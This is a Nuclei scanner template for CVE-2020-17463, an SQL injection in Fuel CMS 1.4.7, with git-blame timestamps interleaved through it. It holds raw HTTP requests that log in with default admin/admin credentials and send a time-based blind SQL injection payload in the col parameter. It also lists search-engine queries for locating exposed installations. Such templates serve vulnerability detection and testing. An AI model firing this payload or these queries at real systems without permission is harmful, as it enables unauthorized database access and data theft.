2023-07-16 07:35:32 +00:00
id : CVE-2020-17463
info :
2023-07-18 07:35:20 +00:00
name : Fuel CMS 1.4.7 - SQL Injection
2023-07-16 10:05:17 +00:00
author : Thirukrishnan
2023-08-31 11:46:18 +00:00
severity : critical
2023-07-16 07:35:32 +00:00
description : |
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
2023-09-06 12:22:36 +00:00
remediation : Fixed in version 115
2023-07-16 07:35:32 +00:00
reference :
- https://www.exploit-db.com/exploits/48741
2023-07-18 07:35:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-17463
- http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
- https://getfuelcms.com/
2023-08-31 11:46:18 +00:00
- https://cwe.mitre.org/data/definitions/89.html
2023-07-16 07:35:32 +00:00
classification :
2023-08-31 11:46:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-07-18 07:35:20 +00:00
cvss-score : 9.8
2023-07-16 07:35:32 +00:00
cve-id : CVE-2020-17463
2023-07-18 07:35:20 +00:00
cwe-id : CWE-89
2024-03-23 09:28:19 +00:00
epss-score : 0.94399
epss-percentile : 0.99154
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
2023-07-16 09:56:13 +00:00
metadata :
verified : true
2023-09-06 12:22:36 +00:00
max-request : 3
2023-08-31 11:46:18 +00:00
vendor : thedaylightstudio
product : fuel_cms
2023-09-06 12:22:36 +00:00
shodan-query : http.title:"fuel cms"
2024-05-31 19:23:20 +00:00
fofa-query : title="fuel cms"
google-query : intitle:"fuel cms"
2024-01-14 09:21:50 +00:00
tags : cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
2023-07-16 07:35:32 +00:00
http :
- raw :
- |
2023-07-18 05:55:12 +00:00
GET /fuel/login/ HTTP/1.1
2023-07-16 07:35:32 +00:00
Host : {{Hostname}}
- |
2023-07-16 09:56:13 +00:00
POST /fuel/login/ HTTP/1.1
2023-07-16 07:35:32 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-07-16 15:31:00 +00:00
Referer : {{RootURL}}
2023-07-16 07:35:32 +00:00
2023-07-16 09:56:13 +00:00
user_name={{username}}&password={{password}}&Login=Login&forward=
2023-07-16 07:35:32 +00:00
- |
2023-07-16 09:56:13 +00:00
@timeout : 10s
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
2023-07-16 07:35:32 +00:00
Host : {{Hostname}}
X-Requested-With : XMLHttpRequest
2023-07-16 15:31:00 +00:00
Referer : {{RootURL}}
2023-07-16 09:56:13 +00:00
payloads :
username :
- admin
password :
- admin
attack : pitchfork
2023-07-16 07:35:32 +00:00
matchers :
- type : dsl
dsl :
2023-07-16 09:56:13 +00:00
- 'duration>=6'
2023-07-16 07:35:32 +00:00
- 'status_code_3 == 200'
2023-07-18 05:55:12 +00:00
- 'contains(body_1, "FUEL CMS")'
2023-07-16 07:35:32 +00:00
condition : and
2024-03-25 11:57:16 +00:00
# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950